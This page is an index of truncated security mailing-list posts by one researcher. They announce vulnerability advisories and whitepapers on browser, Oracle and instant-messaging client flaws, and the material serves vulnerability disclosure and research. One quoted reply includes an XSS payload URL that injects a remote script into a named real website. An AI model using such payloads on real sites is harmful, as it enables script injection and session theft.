CVE-2010-2404 | Persistent Cross Site Scripting Vulnerability in Oracle I-Recruitment - E-Business Suite

/SNS_09_01_Evad_Xss_Filter_Msword.pdf Disclosure: The vulnerability was disclosed to Oracle in January 2009 and is patched in October 2010 CPU release. Credit: Aditya K Sood of SecNiche Security Contact: adi_ks [at] secniche.org Disclaimer The information in the advisory is believed to be accurate at the

CVE-2010-3200 : Microsoft Word 2003 MSO Null Pointer Dereference Vulnerability

ill be patched or corrected. Regards Aditya K Sood

Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

Hi Tim You can have a look at the screenshot at below mentioned link http://www.secniche.org/goog_chr_auth_spoof.jpg Kind Regards Aditya Tim wrote: > Aditya, > > >> First of all, the dialog spoofing issue still works in Google Chrome and >> it has not been patched. >> > > I'm not surp

Re: Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

Hi Tim First of all, the dialog spoofing issue still works in Google Chrome and it has not been patched. A lot of tests have been conducted considering different variants spoofing. I missed your paper previously. I must say its a very good read. A similar issue about Google URL obfuscation, which

Google Chrome: HTTP AUTH Dialog Spoofing through Realm Manipulation (Restated)

ced in the video itself) Kind Regards Aditya K Sood http://www.secniche.org

Google Chrome 3.0.195.38 | Chrome Frame - Reloading Memory Allocation based Tab Crashing

: http://www.secniche.org/videos/goog_chrome_frame_mem_alloc_tab_crashing.html Blog Post: http://zeroknock.blogspot.com/2010/01/google-chrome-3019538-chrome-frame.html It can have diverse impact with more modularized codes in the future. All for community purposes. Kind Regards Aditya K Sood http

Re: [WEB SECURITY] Re: Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

Hi Berend-Jan Please find the respective responses > Repro steps: > 1) Some website do not sanitize user input correctly, such as the one > in your example, which allows things like XSS: > http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c

Link Injection Redirection Attacks - Exploiting Google Chrome Design Flaw

cting web application attacks. Post: http://zeroknock.blogspot.com/2010/01/link-injection-redirection-attacks.html Video: http://www.secniche.org/videos/google_chrome_link_inj.html Browsers need to take care of these issues. Regards Aditya K Sood http://www.secniche.org

Advisory - Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing

Hi Google docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with a discretion. This was done to mitigate the risk . Google had worked over it and patched it with in a period of 5 days. The Google doc has been refined now and the integrated support f

[SecNiche WhitePaper ] - PDF Silent HTTP Form Repurposing Attacks

Hi This paper sheds light on the modified approach to trigger web attacks through JavaScript protocol handler in the context of browser when a PDF is opened in it. As we have seen, the kind of security mechanism implemented by Adobe in order to remove the insecurities that originate directly from

In Response to Bid 34130 Invalid

The observed behavior is explained on below mentioned link http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html This vulnerability persists in newer version of Google Chrome too.

[SecNiche Whitepaper] Evading Web XSS Filters with Microsoft Word - WAPT Perspective

generation of new attack vectors. You can download the paper at: http://www.secniche.org/paper.html http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf Regards Aditya K Sood Founder , SecNiche Security http://www.secniche.org

Microsoft Internet Explorer 8 - Anti Spoofing is a Myth

. Browsers like MOZILLA, Chrome etc are having well designed and effective status address bars. For detail issue : http://www.secniche.org/ie_spoof_myth/ Regards Aditya K Sood http://www.secniche.org

Advisory: Google Chrome 1.0.154.43 ClickJacking Vulnerability.

tested are: Chrome/1.0.154.43 Disclosure Timeline: Disclosed: 27 January 2009 Release Date. 28 January 2009 Vendor Response: Google acknowledges this vulnerability and already working on it. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time

Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability

l advisory update of 13 January 2009 Oracle Critical Patch Update: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Credit: Oracle Credited Aditya K Sood for discovering this vulnerability Disclaimer: The information in the advisory is believed to be accur

Google Chrome FTP PASV IP Malicious Port Scanning Vulnerability.

severity level of this flaw.The chrome ID of this issue is 5978. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition

Updated: Google Chrome 0.4.154.25 URI Meta Character URL Obfuscation

Hi All The Google chrome new version 0.4.154.25 is also suffering from this vulnerability.The full POC have been released at milw0rm. Have a look at it: http://milw0rm.com/exploits/7226 The problem is this most of web servers have anti viruses which treated it as URL Spoofing virus. Anyways the

Google Chrome MetaCharacter URI Obfuscation Vulnerability

Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 24 November 2008 Release Date. 24 November ,2008 Vendor Response: Reported to Google. Credit: Aditya K Sood Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use

Google Chrome OnbeforeUload and OnUnload Null Check Vulnerability.

ility affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are: Chrome/0.2.149.30 Chrome/0.2.149.29 Disclosure Timeline: Disclosed: 19 October 2008 Release Date. 21 October ,2008 Vendor Response: Google acknowledges this vulnerability and "fix" will be release

Advisory: Google Chrome Window Object Suppressing Remote Denial of Service.

:* Disclosed: 25 September 2008 Release Date. September 27 ,2008 *Vendor Response:* Google acknowledges this vulnerability as security bug and "fix" will be released soon. *Credit:* Aditya K Sood *10. Disclaimer* The information in the advisory is believed to be accurate at the time of publis

Advisory : Opera Window Object Suppressing Remote Denial of Service

this vulnerability affects Opera on Microsoft Windows XP SP2 platform.The versions tested are: Opera 9.52 *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date. 28 September ,2008 *Vendor Response:* Vulnerability reported to Opera. Bug ID 365663 *Credit:* Aditya K Sood *Disclaimer

Advisory: Mozilla Firefox User Interface Null Pointer Dereference Dispatcher Crash and Remote Denial of Service.

x on Microsoft Windows XP SP2 platform.The versions tested are: Mozilla 3.0.3 - 1.9.0 Branch *Disclosure Timeline:* Disclosed: 28 September 2008 Release Date. 28 September ,2008 *Vendor Response:* Mozilla confirm this vulnerability. * Credit:* Aditya K Sood *Disclaimer* The information in

Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.

t;fix" will be released soon. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no represe

Re: Pidgin IM Client Password Disclosure Vulnerability.

al Message----- From: Aditya K Sood [mailto:[EMAIL PROTECTED] Sent: Wednesday, 17 September 2008 10:41 PM To: bugtraq@securityfocus.com Subject: Pidgin IM Client Password Disclosure Vulnerability. Pidgin IM Client Password Disclosure Vulnerability. *Version Affected:* 0.7.10 Unicode / Previous vers

Hi Two Points to consider

Hi Bugtraq Two point I want to make. 1. The version number in pidgin advisory should be 2.5.1 2. In skype explanation instead of pidgin process skype process should be there. I have corrected this on the reference sites. Just want to let you know. If any issues please let me know. Regards

Microsoft Internet Explorer DoS in Rendering Malicious PNG Files.

vulnerability and "fix" will be released in the final version of Internet Explorer 8 later this year. *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the i

Pidgin IM Client Password Disclosure Vulnerability.

cniche.org/advisory.html http://evilfingers.com/advisory/index.php * Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS

Miranda IM Client Password Disclosure Vulnerability.

cept: http://evilfingers.com/advisory/miranda_im_mem_pass_disc.pdf http://secniche/advisory/miranda_vul.pdf ** * *Links: *http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of

Skype IM Client Password Disclosure Vulnerability.

t: **http://evilfingers.com/advisory/skype_pass_dis_vul.pdf http://secniche.org/advisory/skype_vul.pdf Links: http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php * *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of

[Mlabs] Dissecting Internals of Windows XP Svchost : Reverse Engineering Stature

Hi all This is the reverse Engineering layout of Scvhost Internals. |Category : Reverse Engineering Analysis. The paper solely relates to the core internals that build up the Windows XP Svchost. The Svchost internals have not been disseminated into informative elements yet. I have found only on

Re: 0day: PDF pwns Windows

pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF

[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM

Hi I have released core research paper on SIP comprising of Payload problems and Attack vectors. This research paper lays stress on the potential weaknesses present in the SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol.

[Paper] The Anatomy of Third Party Pop Up Attacks.

Hi This article deals with the latest third party popup attacks that are performed by an attacker from the rogue and vulnerable links of the web sites to circumvent the normal functioning on the web. The target website always seems to be the liable web provider from where the popup attacks are

Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

rity sites like secunia or idefence. This would certainly save you from public embarrassment. -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Aditya K Sood Sent: 17 August 2007 09:07 To: [EMAIL PROTECTED]; bugtraq@securityfocus.com; [EMAIL PROTECTE

SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability Dated : 15 August 2007 Severity : Critical Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popup in the running instance of Internet Explorer.

[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON

hi A specific white paper have been released comprising of specific application problems related to Bison. You can look into it. http://www.secniche.org/papers/Ser_Insec_Bison.pdf Regards AKS http://www.secniche.org

[CVE-2007-3816][Advisory] JWIG Context-Dependent Template Calling Dos

external templates. For more details : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Links: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3816 http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-3816 Regards Aditya K Sood SecNiche Security

WhitePapers By SecNiche Security

Hi all The whitepapers regarding Java Web Security Technologies have been released. 1. JNLP Security Convergence : http://www.secniche.org/papers/JNLP_Security_Con.pdf 2. Hack Annotations in JWIG : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Regards Aditya K

Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing.

. Avoid visiting untrusted Websites. 2. Script Restriction should be applied. - Aditya K Sood http://www.secniche.org

SECNICHE : Dwelling Security is On the Run

. Aditya K Sood aka Zeroknock http://www.secniche.org

MLabs is Shifted Fully : SecNiche Initiative

Hi all The Mlabs have been fully shifted to secniche domain. You can check it: http://mlabs.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org

Project CERA Is Up Again : Secniche Initiative

Hi all The project CERA is up again. CERA : Cutting Edge Research Arena. You can look into it. http://cera.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org